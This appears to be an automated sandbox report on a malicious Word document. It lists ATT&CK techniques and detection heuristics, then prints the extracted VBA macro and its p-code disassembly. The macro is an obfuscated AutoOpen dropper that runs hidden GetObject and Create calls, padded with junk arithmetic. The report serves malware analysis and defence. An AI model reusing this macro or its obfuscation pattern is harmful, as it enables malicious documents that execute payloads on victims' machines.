Verdict: MALICIOUS (Risk Score 210)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing VBA macros, specifically an AutoOpen macro that utilizes GetObject. This indicates an attempt to execute a malicious payload upon opening. The presence of legacy WordBasic markers and the GetObject call strongly suggest a macro-based execution technique. No specific family could be identified, but the technique is common for initial payload delivery.
Heuristics (7)

- ClamAV: Doc.Malware.Dsau-6904244-0 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Malware.Dsau-6904244-0
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
  Document contains VBA macro code.
- GetObject call [high, OLE_VBA_GETOBJ]
  GetObject call. Matched line in script: Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]
  AutoOpen macro. Matched line in script: Sub autoopen()
- Embedded URL [info, EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13011 bytes |

SHA-256 of macros.bas: a1d00b552e7e61b5fda15317d527c4d5fb1d19d86f7637f31c6e44099716d19b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZDGQBc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sAxoAx"
Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "WDBBAQA"
Sub autoopen()
On Error Resume Next
If SGAQDA = O1U_A4G Then
XQBBXB = (354164903)
Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080)
SD_A1A = (876277793)
End If
If joxXB_A = zw1kAo Then
ABCBXAAU = (907333972)
kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498)
K1GQ4A = (208115342)
End If
If vAkDw4_ = YXAXAx Then
w1DAAAk = (911857544)
V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324)
WZX_1x = (386064342)
End If
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
If zDBAxA = i1AAAxAw Then
BB4ZcQ = (370313042)
wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715)
iD1AA4 = (573405040)
End If
If howAUx = tcBQA1 Then
JUD1Ux4A = (587887753)
rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775)
K4GBAU = (230801638)
End If
If KAxAGDA4 = LDXCAk Then
zkBAoGcA = (543619911)
vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616)
dcAAC4 = (239226092)
End If
awcDAXDw.ShowWindow = 711727 - 711727
If zQAwQXA = QBc4C_A Then
kADBAAA = (450440259)
nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610)
uQBQ_QU = (364955007)
End If
If XQQUAw = CUAwow Then
VAokkBw = (919364621)
OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553)
UD1QD1Q4 = (646481162)
End If
GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _
Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_
If wACxAUQ = HcBDQA Then
mGAU4Ac_ = (648909886)
sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096)
sAkQZA_ = (777214553)
End If
If IAxUDAB = nGBAGw Then
SAABAo4 = (613193940)
sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569)
NDAAxQU = (677554219)
End If
If qZDDDA = I4D4cCA Then
sUo1CXAQ = (284786612)
QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942)
sACZGcA = (967372682)
End If
End Sub
' Processing file: /tmp/qstore__adgorvf
' ===============================================================================
' Module streams:
' Macros/VBA/ZDGQBc - 1104 bytes
' Macros/VBA/sAxoAx - 1154 bytes
' Macros/VBA/WDBBAQA - 6138 bytes
' Line #0:
' FuncDefn (Sub WDBBAQA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld SGAQDA
' Eq
' IfBlock
' Line #3:
' LitDI4 0x20A7 0x151C
' Paren
' St O1U_A4G
' Line #4:
' Ld Rkxc1cAD
' LitDI4 0x1570 0x0B0F
' LitDI4 0x4889 0x0564
' Ld uAXZcA_B
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZUAAUw_
' Add
' Ld XBwAAA1c
' Ld PAcGXA
' LitDI4 0x1484 0x24E7
' LitDI4 0x5F50 0x26A6
' Div
' Coerce (Bool)
' Div
' Ld UUxABAoA
' Add
' Ld GoAo_wc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x1FFB 0x2AC7
' Mul
' LitDI4 0x4EF8 0x0865
' Mul
' Add
' Paren
' St XQBBXB
' Line #5:
' LitDI4 0xF021 0x343A
' Paren
' St lXBQcwAZ
' Line #6:
' EndIfBlock
' Line #7:
' Ld SD_A1A
' Ld joxXB_A
' Eq
' IfBlock
' Line #8:
' LitDI4 0xD154 0x3614
' Paren
' St zw1kAo
' Line #9:
' Ld kDDwxZ
' LitDI4 0xA465 0x3601
' LitDI4 0x94B7 0x37FF
' Ld Dw1A1U
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ABGwAUA
' Add
' Ld Z4DQCDAw
' Ld wA4A4xA
' LitDI4 0x5ED8 0x35E6
' LitDI4 0xB2D9 0x0EC4
' Div
' Coerce (Bool)
' Div
' Ld jA11_x
' Add
' Ld Qc4AA4A
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xFEF5 0x0633
' Mul
' LitDI4 0x364A 0x1851
' Mul
' Add
' Paren
' St ABCBXAAU
' Line #10:
' LitDI4 0x968E 0x0C67
' Paren
' St TUwAkDZ
' Line #11:
' EndIfBlock
' Line #12:
' Ld K1GQ4A
' Ld vAkDw4_
' Eq
' IfBlock
' Line #13:
' LitDI4 0xD788 0x3659
' Paren
' St YXAXAx
' Line #14:
' Ld V_1AAA_
' LitDI4 0xC32B 0x29B1
' LitDI4 0xBDB2 0x2277
' Ld iQAwZUU
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld fCwUAZQQ
' Add
' Ld A_AXDQQA
' Ld lBAUAXAB
' LitDI4 0x9811 0x0DF2
' LitDI4 0x80E0 0x3430
' Div
' Coerce (Bool)
' Div
' Ld jQAAA_
' Add
' Ld GG_BGDDx
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x8251 0x1CE5
' Mul
' LitDI4 0x529C 0x2AEF
' Mul
' Add
' Paren
' St w1DAAAk
' Line #15:
' LitDI4 0xDFD6 0x1702
' Paren
' St joUoAQAQ
' Line #16:
' EndIfBlock
' Line #17:
' SetStmt
' Ld GetObject
' Ld MSForms
' MemLd ExAADAAB
' Add
' Ld E4w_Ak
' Add
' ArgsLd awcDAXDw 0x0001
' Set WZX_1x
' Line #18:
' Ld GZUAB1
' Ld zDBAxA
' Eq
' IfBlock
' Line #19:
' LitDI4 0x8752 0x1612
' Paren
' St i1AAAxAw
' Line #20:
' Ld wxABAAZ
' LitDI4 0x6A9C 0x129A
' LitDI4 0x6E95 0x2D16
' Ld BoUABGQA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld wB_xAB
' Add
' Ld UAADAAB
' Ld TBGwAXX
' LitDI4 0x87A1 0x0A79
' LitDI4 0x887E 0x3B0E
' Div
' Coerce (Bool)
' Div
' Ld NAABw4A
' Add
' Ld s41xDA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xBC40 0x3771
' Mul
' LitDI4 0xB103 0x0A5A
' Mul
' Add
' Paren
' St BB4ZcQ
' Line #21:
' LitDI4 0x7770 0x222D
' Paren
' St SAABBU
' Line #22:
' EndIfBlock
' Line #23:
' Ld iD1AA4
' Ld howAUx
' Eq
' IfBlock
' Line #24:
' LitDI4 0x7489 0x230A
' Paren
' St tcBQA1
' Line #25:
' Ld rCU_ZB
' LitDI4 0xC581 0x298E
' LitDI4 0x554F 0x1100
' Ld cUQG4AZZ
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld EAAZADo
' Add
' Ld PBAAcCD
' Ld EAC4BQU
' LitDI4 0x75AF 0x382F
' LitDI4 0x8487 0x3764
' Div
' Coerce (Bool)
' Div
' Ld LAZoD1x
' Add
' Ld KACAAAAA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x0199 0x1CA3
' Mul
' LitDI4 0xC167 0x0419
' Mul
' Add
' Paren
' St JUD1Ux4A
' Line #26:
' LitDI4 0xC0E6 0x0DC1
' Paren
' St EAxXXUA
' Line #27:
' EndIfBlock
' Line #28:
' Ld K4GBAU
' Ld KAxAGDA4
' Eq
' IfBlock
' Line #29:
' LitDI4 0xFB47 0x2066
' Paren
' St LDXCAk
' Line #30:
' Ld vQABAB
' LitDI4 0x4CC5 0x0356
' LitDI4 0x0A50 0x0161
' Ld LZQA1AC_
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YCA_AX
' Add
' Ld R1ABw_
' Ld uZADAwD
' LitDI4 0xE450 0x2B8D
' LitDI4 0x9DE7 0x320C
' Div
' Coerce (Bool)
' Div
' Ld UAQAwA
' Add
' Ld z4BACZC
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xCBBA 0x3AAD
' Mul
' LitDI4 0x4548 0x2472
' Mul
' Add
' Paren
' St zkBAoGcA
' Line #31:
' LitDI4 0x4CEC 0x0E42
' Paren
' St iAZAA_BB
' Line #32:
' EndIfBlock
' Line #33:
' LitDI4 0xDC2F 0x000A
' LitDI4 0xDC2F 0x000A
' Sub
' Ld WZX_1x
' MemSt dcAAC4
' Line #34:
' Ld ShowWindow
' Ld zQAwQXA
' Eq
' IfBlock
' Line #35:
' LitDI4 0x2C43 0x1AD9
' Paren
' St QBc4C_A
' Line #36:
' Ld nAwDBcU
' LitDI4 0x0A64 0x1C32
' LitDI4 0x82D3 0x2906
' Ld sAUwAw
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jAZoGAU
' Add
' Ld a1DD__
' Ld FQk4AAA
' LitDI4 0x6434 0x02ED
' LitDI4 0x74BD 0x1F5F
' Div
' Coerce (Bool)
' Div
' Ld OBA4AC4A
' Add
' Ld bC_QQAc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x5A59 0x0140
' Mul
' LitDI4 0xCABA 0x195C
' Mul
' Add
' Paren
' St kADBAAA
' Line #37:
' LitDI4 0xC57F 0x15C0
' Paren
' St wQAoDAU
' Line #38:
' EndIfBlock
' Line #39:
' Ld uQBQ_QU
' Ld XQQUAw
' Eq
' IfBlock
' Line #40:
' LitDI4 0x640D 0x36CC
' Paren
' St CUAwow
' Line #41:
' Ld OGCQDA
' LitDI4 0x0F06 0x0062
' LitDI4 0xF388 0x329A
' Ld wA_4ZDk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld TAA4QDA
' Add
' Ld u4QBBA
' Ld NQAwwD1X
' LitDI4 0xD019 0x0237
' LitDI4 0xD95D 0x0788
' Div
' Coerce (Bool)
' Div
' Ld GQxkcAZA
' Add
' Ld WAxGAA4
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x7440 0x0AB0
' Mul
' LitDI4 0xA1D1 0x0913
' Mul
' Add
' Paren
' St VAokkBw
' Line #42:
' LitDI4 0x850A 0x2688
' Paren
' St tUDAAc
' Line #43:
' EndIfBlock
' Line #44:
' LineCont 0x0004 0B 00 00 00
' Ld Create
' Ld MSForms
' MemLd pACA_A
' Add
' Ld NBwA1D
' Add
' Ld MSForms
' MemLd QcAAADBB
' Add
' Ld Z4AkAkZ
' Add
' Ld MSForms
' MemLd pDAXUowA
' Add
' Ld wkUQUBZA
' Add
' Ld YoB1D1_
' Ld WZX_1x
' Ld QZAAAZAQ
' Ld UD1QD1Q4
' Ld MSForms
' MemLd wwcBBGA
' Add
' Ld cDDAAAxB
' Add
' ArgsLd awcDAXDw 0x0001
' ArgsMemCall HwQAD4UA@ 0x0004
' Line #45:
' Ld WAwGAAA_
' Ld wACxAUQ
' Eq
' IfBlock
' Line #46:
' LitDI4 0x943E 0x26AD
' Paren
' St HcBDQA
' Line #47:
' Ld sD4xBUAC
' LitDI4 0x42E8 0x16B5
' LitDI4 0xC350 0x36E4
' Ld a4ADAUk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YAGCAA
' Add
' Ld wQZUCAA
' Ld zUBcCAwD
' LitDI4 0x38B3 0x172F
' LitDI4 0xABFF 0x3828
' Div
' Coerce (Bool)
' Div
' Ld oxBDAxQ
' Add
' Ld WG4AxD
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xF494 0x0393
' Mul
' LitDI4 0xD070 0x2009
' Mul
' Add
' Paren
' St mGAU4Ac_
' Line #48:
' LitDI4 0x5A59 0x2E53
' Paren
' St ZAGoAUwA
' Line #49:
' EndIfBlock
' Line #50:
' Ld sAkQZA_
' Ld IAxUDAB
' Eq
' IfBlock
' Line #51:
' LitDI4 0x98D4 0x248C
' Paren
' St nGBAGw
' Line #52:
' Ld sXAAwUAo
' LitDI4 0xB26E 0x0426
' LitDI4 0x7C04 0x0AB1
' Ld LAU4xC4w
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZCCG1Ak
' Add
' Ld EAAACcD
' Ld EQAQAwwA
' LitDI4 0x0D8C 0x28AF
' LitDI4 0x53BD 0x059F
' Div
' Coerce (Bool)
' Div
' Ld NUQAAA
' Add
' Ld VAAx1AU
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xE084 0x3921
' Mul
' LitDI4 0x2D89 0x255F
' Mul
' Add
' Paren
' St SAABAo4
' Line #53:
' LitDI4 0xA82B 0x2862
' Paren
' St DcAQwDQD
' Line #54:
' EndIfBlock
' Line #55:
' Ld NDAAxQU
' Ld qZDDDA
' Eq
' IfBlock
' Line #56:
' LitDI4 0x7FB4 0x10F9
' Paren
' St I4D4cCA
' Line #57:
' Ld QG4UoC
' LitDI4 0x7A38 0x2005
' LitDI4 0xD895 0x3978
' Ld lDwACQAo
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jXAZDoco
' Add
' Ld cQDUkZxG
' Ld cDAAAQ
' LitDI4 0x1AA5 0x0703
' LitDI4 0x266B 0x37CB
' Div
' Coerce (Bool)
' Div
' Ld KAUBAoQ
' Add
' Ld wCQQBA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x64AF 0x08D3
' Mul
' LitDI4 0x5C86 0x1FD2
' Mul
' Add
' Paren
' St sUo1CXAQ
' Line #58:
' LitDI4 0xEF8A 0x39A8
' Paren
' St LAABBww
' Line #59:
' EndIfBlock
' Line #60:
' EndSub
' Line #61: